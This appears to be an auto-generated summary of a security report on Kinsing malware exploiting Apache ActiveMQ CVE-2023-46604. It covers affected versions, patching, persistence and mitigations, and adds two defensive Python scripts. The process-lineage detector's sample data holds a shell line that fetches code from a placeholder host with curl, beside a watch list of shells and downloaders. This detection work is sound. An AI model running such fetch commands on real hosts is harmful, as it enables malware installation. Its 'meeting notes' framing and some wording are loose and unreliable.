CVE-2023-46604 (Apache ActiveMQ) Exploited to Infect Systems With Cryptominers and Rootkits

November 20, 2023 at 04:16AM

The Apache ActiveMQ vulnerability CVE-2023-46604 is being actively exploited by threat actors to download and infect Linux systems with the Kinsing malware and cryptocurrency miner. The vulnerability allows remote code execution, which Kinsing utilizes to install malware. Users are advised to upgrade their ActiveMQ versions to address the issue. The Kinsing malware is a critical threat that targets Linux-based systems and can spread rapidly across a network. It is recommended to take immediate action to patch the vulnerability and enhance cybersecurity measures.

Key takeaways from the meeting notes:

1. Exploitation of Apache ActiveMQ vulnerability CVE-2023-46604: The meeting notes highlight the active exploitation of the vulnerability CVE-2023-46604 in Apache ActiveMQ, an open-source protocol for message-oriented middleware. This vulnerability allows remote code execution (RCE) and has been exploited by threat actors to download and infect Linux systems with the Kinsing malware (also known as h2miner) and its cryptocurrency miner.

2. Kinsing malware: Kinsing is a critical threat that primarily targets Linux-based systems. It infiltrates servers and spreads rapidly across networks by exploiting vulnerabilities in web applications or misconfigured container environments. Once installed, it deploys a cryptocurrency-mining script that exploits the host’s resources to mine cryptocurrencies like Bitcoin, causing damage to the infrastructure and impacting system performance.

3. Affected versions: The meeting notes provide a list of Apache ActiveMQ versions that are vulnerable to CVE-2023-46604. Users are advised to upgrade both Java OpenWire brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 to fix the issue.
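The following is an added example, not code from the original article or from the Apache ActiveMQ project: a small inventory triage helper that compares a broker's version string against the fixed releases listed above. It assumes that each listed release (5.15.16, 5.16.7, 5.17.6, 5.18.3) is the first safe build on its minor branch, that every 5.x release older than the 5.15 branch is unpatched, and it reports branches the list does not cover (for example 6.x) as unknown rather than guessing. The host names in the sample inventory are constructed.

```python
# Added example (not from the original article): classify ActiveMQ version
# strings against the fixed releases named in the advisory.
# Assumption: the listed releases are the first patched build on each branch,
# and any 5.x release before the 5.15 branch is treated as unpatched.
from typing import List, Optional, Tuple

FIXED_RELEASES = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'major.minor[.patch]'; suffixes such as '-SNAPSHOT' are ignored."""
    core = text.strip().split("-")[0]
    parts = core.split(".")
    if len(parts) < 2:
        raise ValueError(f"unrecognised version string: {text!r}")
    nums = [int(p) for p in parts[:3]]
    while len(nums) < 3:
        nums.append(0)
    return nums[0], nums[1], nums[2]


def is_vulnerable(text: str) -> Optional[bool]:
    """True if below the branch's fixed release, False if at/above it,
    None when the branch is outside what the listed fixes cover."""
    major, minor, patch = parse_version(text)
    if major != 5:
        return None  # e.g. 6.x: not covered by the list on this page
    if minor < 15:
        return True  # branches older than 5.15 never received the fix
    fixed = FIXED_RELEASES.get((major, minor))
    if fixed is None:
        return None
    return (major, minor, patch) < fixed


def triage(inventory: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (host, version, status) rows for a list of (host, version) pairs."""
    labels = {True: "VULNERABLE", False: "patched", None: "unknown"}
    return [(host, ver, labels[is_vulnerable(ver)]) for host, ver in inventory]


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = [("mq-01", "5.17.3"), ("mq-02", "5.18.3"),
              ("mq-03", "5.14.5"), ("mq-04", "6.0.0")]
    for row in triage(sample):
        print(*row)
```

Feed it the version reported by the broker (for example from the admin console or the distribution's `activemq` startup banner); an "unknown" result means the branch is not on the page's list and should be checked against the vendor advisory directly.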

4. Patch difference: The meeting notes describe the patch based on the analysis of the vulnerability. The patch adds the validateIsThrowable method to the BaseDataStreamMarshaller class, which validates that a class named in an OpenWire command is actually a Throwable type before it is unmarshalled.

5. Detection and detection rule: Reports of active exploitation of CVE-2023-46604 have surfaced, and a YARA rule is provided in the meeting notes for scanning purposes. The YARA rule can be used to detect the exploit variant used by the Kinsing malware for CVE-2023-46604.

6. Kinsing exploitation: The meeting notes provide insights into how Kinsing exploits CVE-2023-46604. The malware leverages Java's ProcessBuilder to execute commands on affected systems, downloading and executing the Kinsing cryptocurrency miner and malware. It also searches for competing cryptocurrency miners and removes them from the infected host.
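As an added example (not part of the original article and not Kinsing or ActiveMQ code), the check below turns the behaviour just described into a host-side detection: it walks a process snapshot and flags any shell or download utility whose ancestry leads back to the ActiveMQ broker's java process, since a healthy broker has no reason to spawn such children. It assumes the snapshot comes from `ps -eo pid,ppid,comm,args --no-headers`, that the broker is identified by a java process whose command line mentions activemq, and the sample snapshot (pids, the placeholder.invalid hostname) is constructed.

```python
# Added example (not from the original article): flag shells and downloaders
# running beneath an ActiveMQ broker's java process.
# Assumption: input lines look like `ps -eo pid,ppid,comm,args --no-headers`.
from typing import Dict, List

SUSPECT_COMMS = {"sh", "bash", "dash", "curl", "wget"}


def load_ps(text: str) -> List[Dict]:
    """Parse 'pid ppid comm args' lines into dicts."""
    procs = []
    for raw in text.splitlines():
        parts = raw.split(None, 3)
        if len(parts) < 3:
            continue
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        procs.append({"pid": pid, "ppid": ppid, "comm": comm,
                      "cmdline": parts[3] if len(parts) == 4 else comm})
    return procs


def is_broker(proc: Dict) -> bool:
    return proc["comm"] == "java" and "activemq" in proc["cmdline"].lower()


def broker_descendants(procs: List[Dict]) -> List[Dict]:
    """Processes that have an ActiveMQ broker somewhere in their parent chain."""
    by_pid = {p["pid"]: p for p in procs}
    broker_pids = {p["pid"] for p in procs if is_broker(p)}
    found = []
    for p in procs:
        seen = set()          # guards against cycles in a malformed snapshot
        ppid = p["ppid"]
        while ppid in by_pid and ppid not in seen:
            if ppid in broker_pids:
                found.append(p)
                break
            seen.add(ppid)
            ppid = by_pid[ppid]["ppid"]
    return found


def suspicious_children(procs: List[Dict]) -> List[Dict]:
    """Broker descendants whose command is a shell or a download utility."""
    return [p for p in broker_descendants(procs) if p["comm"] in SUSPECT_COMMS]


# Constructed sample snapshot (pids, paths and hostname are not real).
SAMPLE_PS = """\
    1     0 java /usr/lib/jvm/bin/java -jar /opt/other/app.jar
  812     1 java /usr/bin/java -Xms64M -Djava.util.logging.config.file=logging.properties org.apache.activemq.console.Main start
 1043   812 sh sh -c curl -fsSL http://placeholder.invalid/constructed
 1044  1043 curl curl -fsSL http://placeholder.invalid/constructed
 1102     1 sshd /usr/sbin/sshd -D
 1150  1102 bash -bash
"""

if __name__ == "__main__":
    for p in suspicious_children(load_ps(SAMPLE_PS)):
        print(f"pid {p['pid']} ({p['comm']}) under broker: {p['cmdline']}")
```

The bash session under sshd is deliberately left alone: the rule keys on the broker's process lineage, not on shells in general, which keeps it quiet on an administrator's normal logins.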

7. Persistence and compromise: Kinsing ensures persistence on affected hosts by loading its rootkit through /etc/ld.so.preload, completing a full system compromise.

8. Mitigation measures: Organizations using Apache ActiveMQ are advised to patch CVE-2023-46604 promptly. It is also important to regularly update security patches, conduct configuration audits, and monitor network traffic for unusual activity. Additionally, utilizing comprehensive security solutions and employing a multilayered defense strategy is recommended.

9. Additional protection: The meeting notes provide rules and filters that can provide additional protection against CVE-2023-46604 exploits, including Trend Micro™ Managed XDR and Trend Micro™ Deep Security™ IPS rules.

10. Indicators of Compromise (IOCs): The meeting notes mention the availability of indicators of compromise for the discussed entry. These IOCs can aid in detecting and responding to the Kinsing malware and its associated activities.
